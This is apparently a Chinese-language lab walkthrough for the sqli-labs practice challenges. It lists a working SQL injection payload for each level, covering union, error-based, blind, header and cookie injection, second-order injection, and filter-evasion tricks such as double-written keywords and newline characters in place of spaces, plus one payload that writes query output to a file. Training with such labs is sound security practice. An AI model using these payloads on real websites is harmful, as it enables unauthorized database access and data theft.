Less-01
payload
为-1' union select 1,2,database()%23
Less-02
payload
为-1 union select 1,2,database()
Less-03
payload
为-1') union select 1,2,database()%23
Less-04
payload
为-1") union select 1,2,database()%23
Less-05
payload
为1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23
Less-06
payload
为1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23
Less-07
payload
为-1')) union select 1,3,database() into outfile 'C:/7.txt' %23
,两个))
太骚了。
Less-08
payload
为1' and database()='security
Less-09
payload
为1' and sleep(5)%23
Less-10
payload
为1" and sleep(5)%23
Less-11
payload
为post
提交的数据:
uname=' or updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=2&submit=Submit
Less-12
payload
为post
提交的数据:
uname=") or updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=2&submit=Submit
Less-13
payload
为post
提交的数据:
uname=') or (select * from (select concat_ws("^",database(),floor(rand(0)*2))x,count(*) from information_schema.tables group by x) as y) #&passwd=2&submit=Submit
Less-14
payload
为post
提交的数据:
uname=" or (select * from (select concat_ws("^",database(),floor(rand(0)*2))x,count(*) from information_schema.tables group by x) as y) #&passwd=2&submit=Submit
Less-15
payload
为post
提交的数据:
uname=admin' and database()='security&passwd=admin&submit=Submit
Less-16
payload
为post
提交的数据:
uname=admin") and database()=("security&passwd=admin&submit=Submit
Less-17
payload
为post
提交的数据:
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&submit=Submit
Less-18
payload
为post
数据,但是注入点却在ua
上
2222',2,updatexml(1,concat(0x7e,(select database()),0x7e),1))#
Less-19
payload
为post
数据,但是注入点却在referer
上
1' and extractvalue(0x11,concat(0x5e,database(),0x5e)),'1')#
//这里无法使用updatexml()
???
Less-20
先使用用户进行登陆,然后直接改ccokie
,payload
为
uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
Less-21
和Less-20
基本一致,cookie
使用了base64
编码,payload
为
YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIGFuZCAnMQ==
Less-22
和Less-21
基本一致,使用了双引号闭合,payload
为
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIw0%3d
Less-23
过滤了注释符,#
和--
两种方法,直接采用闭合的方式来完成突破。
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1
Less-24
二次注入,申请admin'#
的账户,然后使用admin'#
去进行更改密码,其实改的密码是admin
的,直接拿到admin
的权限。
Less-25
过滤了关键字and
和or
,使用双写绕过。
1' Aandnd 1=2%23
Less-25a
判断注入点的方式使用2-1
和2-0
,其余和上一关一样
2 Aandnd 1=2
Less-26
过滤了and,or,#,--,space
,单引号闭合
1'%0aaandnd%0a'1'='2
Less-26a
闭合方式有变化,而且连续过滤两次空格后%0a
换行符无法使用。
1')%0baandnd%0b1=('2
Less-27
过滤了union
和select
,特别是select
的正则多了m
修饰符,需要三写绕过(和一刷时不一样)
1000'%0auunionnion%0aseseleselectctlect%0a1,database(),'3
Less-27a
单引号变双引号闭合
1000"%0Auunionnion%0Aseseleselectctlect%0A1,database(),"3
Less-28
题目说是报错注入,但是源码中将error
信息关掉了。。。
1')%0aand%0a(updatexml(1,concat(0x5e,database(),0x5e),1))=('1
Less-28a
去掉其他的过滤,只留下了union select
。
1')%0aand%0aif(length(database())>0,sleep(3),1)%23